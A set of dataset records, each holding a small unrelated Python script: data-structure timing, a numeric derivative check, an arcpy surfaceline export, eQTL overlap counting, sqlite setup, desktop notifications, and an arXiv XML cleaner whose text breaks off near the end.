+{"seq_id":"268820485","text":"\"\"\"Performance comparison of Array, and LinkedLists\nmprof run python main.py\n\"\"\"\nimport timeit\nfrom doubly_linked_list import DoublyLinkedList\n\nll = DoublyLinkedList()\narr = []\n\nfor n in range(100_000):\n ll.insert('eggs')\n arr.append('eggs')\n\ndef ll_insert():\n ll.insert('bacon')\n ll.remove_from_end()\n\ndef array_insert():\n arr.insert(0, 'bacon')\n arr.pop()\n\n\nprint('linked list', timeit.timeit(stmt=ll_insert, number=100_000))\nprint('array', timeit.timeit(stmt=array_insert, number=100_000))\n\n","sub_path":"class-06/demos/linked-list-vs-array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"590294048","text":"from sympy import *\r\nimport numpy as np\r\n\r\ndef der2(x1,h):\r\n x=Symbol('x')\r\n f=x*(np.e**x)\r\n res=N(f.subs({x:x1+h}))\r\n res2=N(f.subs({x:x1}))\r\n return ((res-res2)/h)\r\n \r\ndef main():\r\n x=Symbol('x')\r\n f=diff(x*(np.e**x),x)\r\n e=f.subs({x:1})\r\n for i in range(1,17):\r\n r=der2(1,1/(10**i))\r\n print(\"|\"+str(e)+\"|\"+str(1/(10**i))+\"|\"+str(r)+\"|\"+str(abs(e-r))+\"|\")\r\n \r\nif __name__ == \"__main__\":\r\n main()","sub_path":"punto5/punto5.py","file_name":"punto5.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"204472391","text":"# --------------------------------------------------------------------------\r\n# Witteveen+Bos\r\n# ing. H.E.J. Nieuwland - januari 2018\r\n# --------------------------------------------------------------------------\r\n# versie 1.0.3\r\n# --------------------------------------------------------------------------\r\n# Surfaceline als CSV exporteren en vakindeling als Shapefile\r\n# Update 9mei2018 - Schrijft uitvoer csv file ook weg aan het vak.\r\n# Update 6juni2018 - Nu is het ook mogelijk om meerdere dwarsprofielen per vak weg te schrijven en shp per vak maar 1 lijnstuk.\r\n# Update 24juli2018 - Werkt vanuit Vakken FC en zoekt niet meer de losse profiel bestanden(SRFVAK_L_* en SRFVAK_P_*) op maar gebruikt het grote totaal bestand.\r\n# --------------------------------------------------------------------------\r\nimport string, os, sys, locale, arcpy\r\n# INPUT\r\nVakFC = sys.argv[1] # Lijnen FC met de vakken\r\nIDkol = \"ID\" # Kolom met id vak\r\nVkol = \"Vaknaam\" # Kolom met naam vak\r\nodir = sys.argv[2] # uitvoer map\r\nKkol = \"SRFpunten\" # Kolom met type punt\r\nPnmKol = \"PROFIELNAAM\" # kolom met profielnaam tbv def query\r\nKol = \"RepresentatiefProfiel\" # Representatief kolom\r\nSkol = \"SORTEERVOLGORDE2\" # kolom met de sorteervolgorde van de punten.\r\nXkol = \"X_WAARDE\"\r\nYkol = \"Y_WAARDE\"\r\nZkol = \"Z_WAARDE\"\r\nBGkol = \"LENGTE_TOT_BG\" # lengte van alle punten tot het beginpunt v/h profiel\r\noCSV_naam = \"Surfacelines.csv\" # de naam van de uitvoer csv\r\nVAK_uitcsv = \"UIT_CSV_Bestand\" # ook aan het vak wegschrijvn waar de csv staat.\r\nPkolVAK = \"REPROF_NAAM\" # kolom aan vakken bestand voor naam representatief profiel.\r\n# databasedir bepalen\r\nworkspace1 = os.path.dirname(arcpy.Describe(VakFC).catalogPath)\r\nif [any(ext) for ext in ('.gdb', '.mdb', '.sde') if ext in os.path.splitext(workspace1)]:\r\n workspace = workspace1\r\nelse:\r\n workspace = os.path.dirname(workspace1) \r\narcpy.env.workspace = workspace\r\n#---\r\narcpy.env.overwriteOutput = True\r\narcpy.AddMessage(\" >>> ----------------------------------\")\r\narcpy.AddWarning(\" >>> Wegschrijven surfacelines en vakindeling\")\r\narcpy.AddMessage(\" >>> ----------------------------------\")\r\n#---------------------------------------------------------\r\n#---------------------------------------------------------\r\n# ---- START\r\n#-------------------------------------------------------\r\n# per vaklijn naam uitlezen, profielnamen selecteren en lijst van maken.\r\nkolommen = [\"OID@\", \"SHAPE@\", IDkol, Vkol, VAK_uitcsv, PkolVAK]\r\n# Aantal vakken uitlezen.\r\ncount = len(list(i for i in arcpy.da.SearchCursor(VakFC, kolommen)))\r\narcpy.AddMessage(\"Aantal vakken: \"+str(count))\r\n#-------------------------\r\nwith arcpy.da.UpdateCursor(VakFC, kolommen,sql_clause=[None,\"ORDER BY \"+IDkol]) as Upcursor:\r\n for Uprow in Upcursor:\r\n FOUT = False # als de benodigde variabelen niet juist zijn dan geen Surfaceline wegschrijven! \r\n VakID = Uprow[2]\r\n Vnaam = Uprow[3]\r\n Reprof = Uprow[5]\r\n arcpy.AddMessage(\"\\n--------------------------------\")\r\n arcpy.AddMessage(\"VakID: \"+str(VakID))\r\n arcpy.AddMessage(\"Naam: \"+str(Vnaam))\r\n arcpy.AddMessage(\"Representatief profiel: \"+str(Reprof))\r\n #-- De dwarsprofiel FC\r\n lFC = \"PWK_DWARSPROFIEL_LINE\" #\"SRFVAK_L_\"+VakID\r\n plFC = \"PWK_DWARSPROFIEL_POINT\" #\"SRFVAK_P_\"+VakID\r\n arcpy.AddMessage(\"Surfaceline: \"+lFC)\r\n kolommen = [\"SHAPE@XY\", Kkol]\r\n #---------------------------------------------------------\r\n # Als de FC er niet is dan vak overslaan.\r\n Lchk = arcpy.Exists(lFC)\r\n plchk = arcpy.Exists(plFC)\r\n #---------------------------------------------------------\r\n # Eerst Surfaceline wegschrijven \r\n if Lchk and plchk and FOUT == False and Reprof != None:\r\n kolommen = [\"OID@\", \"SHAPE@\", PnmKol]\r\n were = PnmKol + \" = '\" + Reprof + \"'\"\r\n # uitlezen.\r\n try:\r\n count = len(list(i for i in arcpy.da.SearchCursor(lFC, kolommen, where_clause=were)))\r\n #arcpy.AddMessage(\"Aantal dwarsprofielen: \"+str(count))\r\n except:\r\n #arcpy.AddWarning(\" Nog geen representatief profiel gekozen!\")\r\n FOUT = True\r\n if count == 0:\r\n arcpy.AddWarning(\" is 0!!\")\r\n FOUT = True\r\n elif count > 1:\r\n arcpy.AddWarning(\" is te veel!!\")\r\n FOUT = True \r\n else:\r\n arcpy.AddMessage(\" is ok\")\r\n # Doorgaan als er een profiel is.\r\n if not FOUT:\r\n XYlijst = []\r\n VOORLlst = []\r\n TALUDlst = []\r\n # -------------------------\r\n # Van het dwarsprofiel lijntje hebben we niet meer de RD XYZ\r\n # Dus hier naam van het profiel uit halen en de dwarsprofielpunten seleteren\r\n # we kunnen meerdere dwarsprofielen hebben bij hetzelfde vak. Dus alleen het profiel van het vaklijnstuk verwerken.\r\n # Nu naar de punten\r\n were = PnmKol + \" = '\"+Reprof+\"'\"\r\n XYZlijst = Reprof\r\n Pkolommen = [Xkol, Ykol, Zkol, PnmKol, Skol, BGkol]\r\n with arcpy.da.SearchCursor(plFC, Pkolommen, where_clause=were) as cursor2:\r\n for row2 in cursor2:\r\n X = round(row2[0],4)\r\n Y = round(row2[1],4)\r\n Z = round(row2[2],3)\r\n #arcpy.AddMessage(\"XYZ: \"+str(X)+\"/\"+str(Y)+\"/\"+str(Z))\r\n XYZlijst = XYZlijst+\";\"+str(X)+\";\"+str(Y)+\";\"+str(Z)\r\n # Open csv file\r\n arcpy.AddMessage(\"Wegschrijven naar: \"+ oCSV_naam+\" ...\")\r\n if arcpy.Exists(odir+\"/\"+oCSV_naam):\r\n arcpy.AddMessage(\"Profiel wordt toegevoegd aan uitvoer CSV!\")\r\n ll = open(odir+\"/\"+oCSV_naam, \"a\")\r\n else:\r\n arcpy.AddMessage(\"Aanmaken uitvoer CSV...\")\r\n ll = open(odir+\"/\"+oCSV_naam, \"w\")\r\n ll.write(\"LOCATIONID;X1;Y1;Z1;.....;Xn;Yn;Zn;(Profiel)\\n\")\r\n # Profiel wegschrijven.\r\n ll.write(XYZlijst+\"\\n\")\r\n del row2\r\n #-------------------------------------------------------------------------------\r\n # Open csv file 2 per profiel X_RD;Y_RD;Afstand;Z wegschrijven in een losse file\r\n oCSV2_naam = Reprof+\".csv\"\r\n arcpy.AddMessage(\"Profiel los wegschrijven naar: \"+ oCSV2_naam+\" ...\")\r\n if arcpy.Exists(odir+\"/\"+oCSV2_naam):\r\n arcpy.AddMessage(\"Profiel CSV bestaat al en wordt overschreven!\")\r\n ll2 = open(odir+\"/\"+oCSV2_naam, \"w\")\r\n else:\r\n arcpy.AddMessage(\"Profiel CSV aanmaken...\")\r\n ll2 = open(odir+\"/\"+oCSV2_naam, \"w\")\r\n # Profiel wegschrijven\r\n cursor2.reset()\r\n ll2.write(\"X-RD;Y_RD;Afstand;Z\\n\")\r\n for row3 in cursor2:\r\n X = round(row3[0],4)\r\n Y = round(row3[1],4)\r\n Z = round(row3[2],3)\r\n afst = round(row3[5],2)\r\n #arcpy.AddMessage(\"XYZ: \"+str(X)+\"/\"+str(Y)+\"/\"+str(Z)+\"/\"+str(afst))\r\n XYafstZ = str(X)+\";\"+str(Y)+\";\"+str(afst)+\";\"+str(Z)\r\n ll2.write(XYafstZ+\"\\n\")\r\n del row3, cursor2\r\n # naam en locatie uitvoer CSV aan vak koppelen \r\n Uprow[4] = odir+\"/\"+oCSV_naam # naam uitvoer CSV aan het bestand koppelen.\r\n Upcursor.updateRow(Uprow)\r\n#-----------------------------------------------------------------------------------------------\r\n# Als laatste de vakindeling als shape exporteren.\r\n# Hier moeten de dubbele vaklijnen niet in komen te staan dus dubbelingen verwijderen.\r\n# dubbelingen verwijderen\r\narcpy.AddMessage(\"\\n--------------------------------\")\r\narcpy.AddMessage(\"Dubbele vakken niet wegschrijven naar uitvoer shape file.\")\r\n# eerts kopie maken\r\narcpy.CopyFeatures_management(VakFC, \"in_memory/xxVakken\")\r\n# dan unieke vakid lijst maken\r\nIDlijst = []\r\nwith arcpy.da.UpdateCursor(\"in_memory/xxVakken\", [IDkol,Vkol]) as cursor2:\r\n for row2 in cursor2:\r\n arcpy.AddMessage(\"Vaknaam: \"+str(row2[1]))\r\n # als ID nog niet voorkomt dan toevoegen.\r\n lst = set(IDlijst)\r\n if row2[0] not in lst:\r\n IDlijst.append(row2[0])\r\n else:\r\n # record verwijderen\r\n arcpy.AddMessage(\" > vak verwijderen...\")\r\n cursor2.deleteRow()\r\n# en nu wegschrijven \r\narcpy.CopyFeatures_management(in_features=\"in_memory/xxVakken\", out_feature_class=odir+\"/Vakindeling_STPH.shp\")\r\n\r\narcpy.AddMessage(\"\\n >>> KLAAR! <<<\")\r\n","sub_path":"Scripts-rijnenijssel-edwin/scripts_v2/surfacelines_05_schrijf_CSV_SHP_weg.py","file_name":"surfacelines_05_schrijf_CSV_SHP_weg.py","file_ext":"py","file_size_in_byte":9334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"587264130","text":"import argparse\nimport sys\nimport logging\nimport os\nimport gzip\nimport csv\nfrom os import listdir\nfrom os.path import isfile, join\n\nlogger = logging.getLogger('commonEqtl')\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)-8s - %(message)s')\n\nclass GTExOverlapItem:\n def __init__(self, row):\n parts = row.rstrip().split('\\t')\n self.majorAllele = parts[1]\n self.minorAllele = parts[2]\n self.eQTL = parts[0]\n self.Beta = parts[3:]\n self.eQTLCount = len([f for f in self.Beta if f != \"\"])\n self.MajorKey = self.eQTL + \":\" + self.majorAllele + \":\" + self.minorAllele \n self.MinorKey = self.eQTL + \":\" + self.minorAllele + \":\" + self.majorAllele \n \nclass TCGAOverlapItem:\n def __init__(self, row):\n parts = row.rstrip().split('\\t')\n self.majorAllele = parts[1]\n self.minorAllele = parts[2]\n self.eQTL = parts[0]\n self.Beta = parts[3:]\n self.eQTLCount = len([f for f in self.Beta if f != \"\"])\n self.MajorKey = self.eQTL + \":\" + self.majorAllele + \":\" + self.minorAllele \n self.MinorKey = self.eQTL + \":\" + self.minorAllele + \":\" + self.majorAllele\n\ndef findUnique(map1, map2, map3):\n return len([k for k, g in map1.iteritems() if (not g.MajorKey in map2) and (not g.MinorKey in map2) and (not g.MajorKey in map3) and (not g.MinorKey in map3)])\n\ndef findDouble(map1, map2):\n return len([k for k, g in map1.iteritems() if g.MajorKey in map2 or g.MinorKey in map2])\n\ndef findTriple(map1, map2, map3):\n return [k for k, g in map1.iteritems() if ((g.MajorKey in map2) or (g.MinorKey in map2)) and ((g.MajorKey in map3) or (g.MinorKey in map3))]\n\neqtl3OverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_TCGA_rnaTP_snpTP.fdr0.05.tsv\"\neqtl5OverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_TCGA_rnaTP_snpNB.fdr0.05.tsv\"\ngtexOverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_GTEx.tsv\"\n \nlogger.info(\"Reading %s ...\" % eqtl3OverlapFile)\nwith open(eqtl3OverlapFile, \"r\") as f:\n eqtl3Tissues = f.readline().rstrip().split('\\t')[3:]\n eqtl3 = [TCGAOverlapItem(row) for row in f]\n\nlogger.info(\"Reading %s ...\" % eqtl5OverlapFile)\nwith open(eqtl5OverlapFile, \"r\") as f:\n eqtl5Tissues = f.readline().rstrip().split('\\t')[3:]\n eqtl5 = [TCGAOverlapItem(row) for row in f]\n\nlogger.info(\"Reading %s ...\" % gtexOverlapFile)\nwith open(gtexOverlapFile, \"r\") as f:\n gtexTissues = f.readline().rstrip().split('\\t')[3:]\n gtex = [GTExOverlapItem(row) for row in f]\n\ngtexBins = [4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44 ]\ntcgaBins = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n\noutputFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_GTEx_TCGA_fdr0.05.tsv\"\nwith open(outputFile, \"w\") as f:\n f.write(\"MinGTExTissue\\tMinTCGATissue\\tGTEx\\teQTL3\\teQTL5\\tGTEx_eQTL3\\tGTEx_eQTL5\\teQTL3_eQTL5\\tGTEx_eQTL3_eQTL5\\n\")\n for idx in range(0, len(tcgaBins)):\n gtexMin = gtexBins[idx]\n tcgaMin = tcgaBins[idx]\n \n curGtexMap = {g.MajorKey:g for g in gtex if g.eQTLCount >= gtexMin}\n curEqtl3Map = {g.MajorKey:g for g in eqtl3 if g.eQTLCount >= tcgaMin}\n curEqtl5Map = {g.MajorKey:g for g in eqtl5 if g.eQTLCount >= tcgaMin}\n \n # gtexOnly=findUnique(curGtexMap, curEqtl3Map, curEqtl5Map)\n # eqtl3Only=findUnique(curEqtl3Map, curGtexMap, curEqtl5Map)\n # eqtl5Only=findUnique(curEqtl5Map, curGtexMap, curEqtl3Map)\n \n gtexEqtl3 = findDouble(curGtexMap, curEqtl3Map)\n gtexEqtl5 = findDouble(curGtexMap, curEqtl5Map)\n eqtl3Eqtl5 = findDouble(curEqtl5Map, curEqtl3Map)\n \n all = findTriple(curGtexMap, curEqtl3Map, curEqtl5Map)\n f.write(\"%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\n\" % (gtexMin, tcgaMin, len(curGtexMap), len(curEqtl3Map), len(curEqtl5Map), gtexEqtl3, gtexEqtl5, eqtl3Eqtl5, len(all)))\n\nwith open(outputFile + \".all_beta.tsv\", \"w\") as f:\n f.write(\"eQTL\\tRefAllele\\tAltAllele\\t%s\\t%s\\t%s\\n\" % \n (\"GTEx_\" + \"\\tGTEx_\".join(gtexTissues),\n \"eTQL3_\" + \"\\teQTL3_\".join(eqtl3Tissues),\n \"eTQL5_\" + \"\\teQTL5_\".join(eqtl5Tissues)))\n keys = sorted(all)\n for key in keys:\n gtexItem = curGtexMap[key]\n if key in curEqtl3Map:\n eqtl3Item = curEqtl3Map[key]\n else:\n eqtl3Item = curEqtl3Map[gtexItem.MinorKey]\n if key in curEqtl5Map:\n eqtl5Item = curEqtl5Map[key]\n else:\n eqtl5Item = curEqtl5Map[gtexItem.MinorKey]\n f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % \n (gtexItem.eQTL,\n gtexItem.majorAllele,\n gtexItem.minorAllele,\n '\\t'.join(gtexItem.Beta),\n '\\t'.join(eqtl3Item.Beta),\n '\\t'.join(eqtl5Item.Beta)))\n\nlogger.info(\"done\")\n","sub_path":"guoyan/20160826_guoyan_tcga_multi_omics/result/commonGTEx_TCGA_Eqtl.py","file_name":"commonGTEx_TCGA_Eqtl.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"371572792","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 21:49\n# @Author : Ryu\n# @Site : \n# @File : four(计算字符串参数).py\n# @Software: PyCharm\n\ndef my(*diy):\n le = len(diy)\n for i in range(le):\n zimu = 0\n kongge = 0\n shuzi = 0\n qita = 0\n for s in diy[i]:\n if s.isdigit():\n shuzi += 1\n elif s.isalnum():\n zimu += 1\n elif s == \" \":\n kongge +=1\n else:\n qita +=1\n\n print(shuzi,\"个数字\",zimu,\"个字母\",kongge,\"个空格\",qita,\"个其他\")\n\n\ninput(\"请输入字符串\")\nmy(\"dsada212ddada ada \",\"dsad5a1d3a,da\")","sub_path":"venv/Practice/four(计算字符串参数).py","file_name":"four(计算字符串参数).py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"238707940","text":"import os\nimport sys\n\n_packages_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'site-packages'))\n\n\ndef add_py_packages(package_names):\n for item in package_names:\n sys.path.append(os.path.join(_packages_dir, item))\n\n_packages = (\n 'markupsafe-0.23-py2.7.egg',\n 'werkzeug-0.11.11-py2.7.egg',\n 'jinja2-2.8-py2.7.egg',\n 'itsdangerous-0.24-py2.7.egg',\n 'click-6.6-py2.7.egg',\n 'docopt-0.6.2-py2.7.egg',\n 'flask-0.11.1-py2.7.egg',\n 'markdown-2.6.6-py2.7.egg',\n 'path_and_address-2.0.1-py2.7.egg',\n 'pygments-2.1.3-py2.7.egg',\n 'requests-2.11.1-py2.7.egg'\n )\n\nadd_py_packages(_packages)\n\n# Disable SSL warnings\nimport requests.packages.urllib3\nrequests.packages.urllib3.disable_warnings()\n\nimport grip.command\n\n\n__author__ = 'hfannar'\n\ngrip.command.main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"441445939","text":"import sqlite3\n\nwith sqlite3.connect(\"data/formData.db\") as connection:\n c = connection.cursor()\n c.execute(\"\"\"CREATE TABLE postData(name TEXT, message TEXT)\"\"\")\n c.execute('INSERT INTO postData VALUES(\"Admin\", \"Just looking for numbers\")')\n\n c.execute(\"\"\"CREATE TABLE Results(jackpot TEXT, winner TEXT)\"\"\")\n c.execute('INSERT INTO Results VALUES(\"This Weeks Jackpot: €\", \"No Winner\")')\n\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"246817020","text":"#!/usr/bin/env python\n\n# courtesy of http://ubuntuforums.org/showthread.php?t=926797\n\nimport pynotify\nimport os\n\ndef flash_notify(app_name, title, message, icon_filename=\"logo.png\"):\n #initialise pynotify with the app_name\n if not pynotify.init(app_name):\n return False\n\n #create the notification with the icon\n iconURI = os.path.abspath(os.path.join(os.path.dirname(__file__), icon_filename))\n n = pynotify.Notification(title, message, iconURI)\n\n #return True if it displayed, otherwise, False\n return n.show()\n\nif __name__ == '__main__':\n #just a test notification\n if not flash_notify(\"PyNotify Test\", \"Test Title\", \"Test Message\"):\n sys.exit(1)\n","sub_path":"ubuntu_notify.py","file_name":"ubuntu_notify.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"446378627","text":"from selenium import webdriver\nimport logging\n\nlogging_file='example.log'\n\nlogging.basicConfig(filename=logging_file,level=logging.DEBUG)\n\nlogging.debug('begin selenium') #开始记录一个日志\n\ndriver = webdriver.Chrome()\n\nlogging.debug('create chrome')\n\nprint(driver.capabilities['version'])\n\nlogging.debug('print chrome version')","sub_path":"0513练习/logging_test(日志).py","file_name":"logging_test(日志).py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252494127","text":"\"\"\"\n`texify_*` funcs flatten the argument and returns None. Elements after ``texify`` wouldn't have child nodes.\n`clean_*` funcs may keeps some subelements as the argument's child. Returns None.\n`*_text`s collect and return the text within the argument without doing any change to it. Returns str.\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport sys, re\nfrom paths import data_path, results_path, rawxmls_path, cleanlog_path, cleanedxml_path\nfrom os.path import join, basename\nfrom os import listdir\nfrom shutil import copy, copytree\nimport time\n\ndef ignore_ns(root):\n '''\n Clean namespace in the node's tag. Should be called in the first place.\n '''\n for elem in root.iter():\n if not hasattr(elem.tag, 'find'):\n continue\n i = elem.tag.find('}')\n if i >= 0:\n elem.tag = elem.tag[i+1:]\n\ndef opening(elem):\n if elem.text:\n return elem.text\n else:\n return ''\n\ndef inlinepara_text(inpara):\n txt = opening(inpara)\n for elem in inpara:\n if elem.tag == 'para':\n texify_para(elem)\n txt += ' ' + elem.text\n elif elem.tag == 'theorem':\n clean_section(elem)\n txt += ' ' + elem.text\n elif elem.tag == 'float':\n txt += ' ' + float_text(elem)\n return txt\n\ndef p_text(p, dontskip=[]):\n \"\"\"\n Captures all the text within
and its trailing,\n skipping all intermediate tags except , and .\n\n Return the concatenated str.\n \"\"\"\n txt = opening(p) \n for child in p:\n if child.tag in ('p', 'note', 'text', 'emph'):\n txt += ' ' + p_text(child)\n if child.tag == 'inline-para':\n txt += ' ' + inlinepara_text(child)\n elif child.tag in dontskip and child.text: # get text from simple elems in ``dontskip``\n txt += ' ' + child.text\n if child.tail:\n txt += ' ' + child.tail\n if p.tail:\n txt += ' ' + p.tail\n return txt\n\ndef listing_text(lsting):\n txt = opening(lsting)\n for elem in lsting:\n if elem.tag == 'listingline':\n txt += ' ' + p_text(elem)\n if lsting.tail:\n txt += ' ' + lsting.tail\n return txt\n\ndef float_text(flt):\n # results/latexml/=1701.00757.xml\n txt = opening(flt)\n for elem in flt:\n if elem.tag == 'listing':\n txt += ' ' + listing_text(elem)\n elif elem.tag in ('toccaption', 'caption'):\n txt += ' ' + p_text(elem)\n if flt.tail:\n txt += ' ' + flt.tail\n return txt\n\ndef get_ttn(ttelem):\n '''\n Get title str from title element.\n '''\n return p_text(ttelem).strip()\n\ndef texify_para(para):\n '''\n Collects all the
s and extract the text from them.\n Clears all the content in the element, and set the text to ``text``. \n '''\n txt = opening(para)\n for p in para:\n if p.tag in ('p', 'note', 'text', 'personname', 'glossaryphrase') :\n txt += ' ' + p_text(p) \n elif p.tag == 'inline-para':\n txt += ' ' + inlinepara_text(p)\n elif p.tag in ('itemize', 'description'):\n txt += ' ' + descrip_text(p)\n elif p.tag == 'quote':\n txt += ' ' + quote_text(p)\n para.clear() # Change the element tag to 'para': toctitle, titlepage\n para.text = txt\n\ndef item_text(item):\n # Useful: , \n txt = opening(item)\n for elem in item:\n if elem.tag == 'tags': \n for tag in elem:\n for i in tag:\n if i.tag == 'text':\n txt += ' ' + i.text + ':'\n elif elem.tag == 'para':\n texify_para(elem)\n txt += elem.text\n if item.tail:\n txt += ' ' + item.tail\n return txt\n\ndef descrip_text(des): \n # Useful: item\n txt = opening(des)\n for elem in des:\n if elem.tag == 'item': # should be trivial\n txt += ' ' + item_text(elem)\n if elem.tail:\n txt += elem.tail\n if des.tail:\n txt += ' ' + des.tail\n return txt\n\ndef quote_text(quote):\n txt = opening(quote)\n for elem in quote:\n if elem.tag == 'p':\n txt += ' ' + p_text(elem)\n elif elem.tag == 'quote':\n txt += ' ' + quote_text(elem)\n elif elem.tag == 'listing':\n txt += ' ' + listing_text(elem)\n elif elem.tag == 'description':\n txt += ' ' + descrip_text(elem)\n if quote.tail:\n txt += ' ' + quote.tail\n return txt\n\ndef texify(elem, elemtext):\n if elemtext != None:\n elem.clear()\n elem.text = elemtext\n\n\ndef clean_section(secelem):\n # Clear the ``secelem`` and set as `attrib`, s into `text`,\n # keeps subelements like after texifying them.\n\n # Useful: title, para, subsection, subsubsection, theorem, subparagraph, \n # proof, acknowledgements, paragraph, bibliography, note, float\n\n # Ignore: indexmark, figure, bibitem, TOC, tags, toctitle, table, pagination, ERROR\n # txt, titles, subsecs = [], [], []\n secelem.attrib.clear()\n uselesses = []\n for elem in secelem:\n if elem.tag == 'para':\n texify_para(elem)\n elif elem.tag == 'float':\n texify(elem, float_text(elem))\n elif elem.tag == 'title': # in ('title', 'subtitle'):\n secelem.set(elem.tag, get_ttn(elem))\n uselesses.append(elem)\n elif elem.tag in ('subsection', 'subparagraph', 'theorem', 'proof', 'paragraph', 'subsubsection'):\n clean_section(elem)\n elif elem.tag in ('note', 'acknowledgement'): \n texify(elem, p_text(elem))\n elif elem.tag == 'bibliography':\n texify(elem, bib_text)\n else:\n uselesses.append(elem)\n \n for useless in uselesses:\n secelem.remove(useless)\n\ndef clean_chapter(chapelem):\n title = None\n for elem in chapelem:\n if elem.tag == 'para':\n texify_para(elem)\n elif elem.tag == 'toctitle':\n title = p_text(elem)\n elif elem.tag in ('subsection', 'subparagraph', 'section', 'subsubsection'):\n clean_section(elem)\n elem.tag = 'section'\n chapelem.attrib.clear()\n if title:\n chapelem.set('title', title)\n \ndef texify_abstract(ab):\n '''\n Collect the text at the beginning, within subelements and their trailing to ``txt``,\n clear the element,\n and finally, set the text to ``txt``.\n \n Useful children: p, description, quote, inline-para, section, itemize\n '''\n txt = opening(ab)\n for elem in ab:\n if elem.tag == 'p':\n txt += ' ' + p_text(elem)\n elif elem.tag in ('itemize', 'description', 'enumerate'):\n txt += ' ' + descrip_text(elem)\n elif elem.tag == 'inline-para':\n txt += ' ' + inlinepara_text(elem)\n elif elem.tag == 'quote':\n txt += ' ' + quote_text(elem)\n ab.clear()\n ab.text = txt # ignore: break, pagination, ERROR, equation, ...\n\ndef clean_titlepage(doc, titlepage):\n '''Extract abstract and move the element to within \n '''\n abstract = titlepage.find('abstract')\n if abstract:\n texify_abstract(abstract)\n titlepage.remove(abstract)\n doc.insert(3,abstract)\n texify_para(titlepage)\n\ndef bib_text(bib):\n txt = ''\n for elem in bib.iter():\n if elem.tag == 'bibblock':\n txt += ' ' + p_text(elem)\n elif elem.tag == 'para':\n texify_para(elem)\n txt += ' ' + elem.text\n bib.clear()\n bib.text = txt\n\ndef clean(root):\n toremove = []\n for child in root:\n if child.tag in ('title', 'subtitle', 'keywords', 'note', 'acknowledgements', 'classification', 'date'):\n # itertext with skipping subelements\n texify(child, p_text(child)) \n elif child.tag == 'abstract':\n texify_abstract(child)\n elif child.tag in ('section', 'paragraph', 'subparagraph', 'subsection', 'appendix', 'theorem', 'proof', 'subsubsection'):\n clean_section(child)\n if child.tag not in ('appendix', 'theorem', 'proof'):\n child.tag = 'section'\n if child.get('title', None) == 'abstract':\n child.tag = 'abstract'\n elif child.tag in ('para', 'creator', 'glossarydefinition'): \n # Collect text with skipping subsubelements\n texify_para(child) \n elif child.tag == 'titlepage':\n clean_titlepage(root, child)\n elif child.tag in ('chapter', 'part'):\n clean_chapter(child)\n child.tag = 'chapter'\n elif child.tag == 'bibliography':\n texify(child, bib_text(child))\n else: # Remove
,
, , , , , , , , \n toremove.append(child)\n for i in toremove:\n root.remove(i)\n \n \ndef postcheck(root, errlog):\n err = False\n errlog.write(xmlpath + ' \\n')\n\n secdict = {'abstract': root.findall('abstract'), 'secs':root.findall('section')}\n for title in secdict:\n elems = secdict[title]\n if len(elems) == 0: # If element not found\n err = True\n # print(title + ' absent: ' + xmlpath)\n errlog.write(title + ' absent. ')\n continue\n \n # If the node exists but is empty\n for elem in elems:\n try:\n txt = ''.join(elem.itertext()) \n except TypeError:\n print([chunk for chunk in elem.itertext()])\n if txt == '':\n err = True\n # print('Empty ' + title + ' :' + xmlpath)\n errlog.write('Empty ' + title + '. ')\n \n if not err:\n errlog.write('OK. ')\n errlog.write('\\n ================================== \\n')\n \ndef get_root(xmlpath):\n tree = ET.parse(xmlpath)\n root = tree.getroot()\n ignore_ns(root)\n return tree, root\n\nif __name__ == \"__main__\":\n # hep-ph0001047.xml\n # tree = ET.parse(join(data_path, 'out.xml'))\n # XXX:subparagraph case: =hep-th0002024.xml\n VERBOSE, REPORT_EVERY = True, 100\n xmls = [fn for fn in listdir(rawxmls_path) if fn[-4:] == '.xml']\n # xmls = ['=hep-ph0002094.xml']\n \n begin = time.time()\n\n with open(cleanlog_path, 'w') as cleanlog:\n for i, xml in enumerate(xmls):\n xmlpath = join(rawxmls_path, xml)\n try:\n tree, root = get_root(xmlpath)\n except ET.ParseError:\n print('Skipped: ParseError at %s' % xmlpath)\n cleanlog.write(xmlpath + ' \\n' + 'ParseError. \\n' + '================================== \\n')\n continue\n clean(root)\n postcheck(root, cleanlog)\n tree.write(join(cleanedxml_path, xml))\n # tree.write(join(results_path, xml))\n\n\n if VERBOSE:\n if (i+1) % REPORT_EVERY == 0 or i+1 == len(xmls):\n print('%s of %s collected.' % (i+1, len(xmls)))\n\n t = time.time() - begin\n t = t/60\n print(len(xmls), 'files in %s mins' % t)\n # 5575 files in 